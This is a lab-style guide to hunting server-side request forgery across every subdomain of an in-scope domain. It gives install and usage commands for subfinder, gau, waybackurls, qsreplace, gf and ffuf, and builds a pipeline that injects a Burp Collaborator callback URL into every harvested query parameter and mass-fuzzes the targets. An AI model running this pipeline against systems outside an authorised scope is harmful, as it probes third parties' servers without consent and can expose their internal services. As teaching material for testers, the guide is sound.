Finding SSRF (all scope)

The goal of this lab is to use a set of tools to collect all subdomains of a target domain, gather the known URLs and parameters for them, and then confirm SSRF by watching for callbacks in the Burp Collaborator utility.

Tools

subfinder - subdomain discovery.

How to install it:

GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
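
Example usage (the output file name is only an illustration):

subfinder -d example.com -silent -o subdomains.txt  # subdomains.txt is a placeholder name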

qsreplace - Accept URLs on stdin, replace all query string values with a user-supplied value.

How to install it:

go get -u github.com/tomnomnom/qsreplace
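
Example usage with a placeholder Collaborator hostname; every query string value in the input URL is replaced:

echo "https://example.com/page?next=index&id=1" | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net"  # example URL is illustrative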

gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

How to install it:

GO111MODULE=on go get -u -v github.com/lc/gau
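
Example usage, following the flag style of the install above (newer gau releases use --subs); the output file name is illustrative:

gau -subs example.com > gau_urls.txt  # gau_urls.txt is a placeholder name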

waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain.

How to install it:

go get github.com/tomnomnom/waybackurls
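
Example usage (the output file name is illustrative):

echo example.com | waybackurls > wayback_urls.txt  # wayback_urls.txt is a placeholder name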

gf: A wrapper around grep, to help you grep for things.

How to install it:

go get -u github.com/tomnomnom/gf
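
Example usage, assuming the example pattern files from the gf repository (such as the ssrf pattern) are installed in ~/.gf:

cat output.txt | gf ssrf > ssrf_candidates.txt  # ssrf_candidates.txt is a placeholder name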

Filters to exclude static assets from the URL list; the final grep keeps only entries containing the injected Collaborator payload, so it is meant to run after the replacement step below:

grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"

ffuf: Fast web fuzzer written in Go.

How to install it:

go get -u github.com/ffuf/ffuf
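
Basic usage against a single target (the wordlist and URL here are placeholders):

ffuf -w wordlist.txt -u https://example.com/FUZZ  # wordlist.txt is a placeholder name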

Scope

In Scope: *.example.com

Harvester

(gau -subs example.com; subfinder -d example.com -silent | waybackurls) | sort -u > output.txt
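
A quick sanity check on the harvested list:

wc -l output.txt && head -n 5 output.txt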

Replacing params

cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
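
Before fuzzing, the exclusion filters above can be applied and the list deduplicated; the final grep keeps only entries where qsreplace actually injected the Collaborator payload. The filtered file name is illustrative; feed it to ffuf in the next step if you use this filter:

cat fuzz_list.txt | grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator" | sort -u > fuzz_list_filtered.txt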

Fuzzing and testing

ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
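
To keep a record of what was sent, ffuf can also write its results to a file; afterwards, check the Burp Collaborator client for DNS or HTTP interactions, which indicate that a target fetched the injected URL. The output file name is illustrative:

ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r -o ffuf_results.json -of json  # ffuf_results.json is a placeholder name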

Resources

To collect all URLs from several sources:
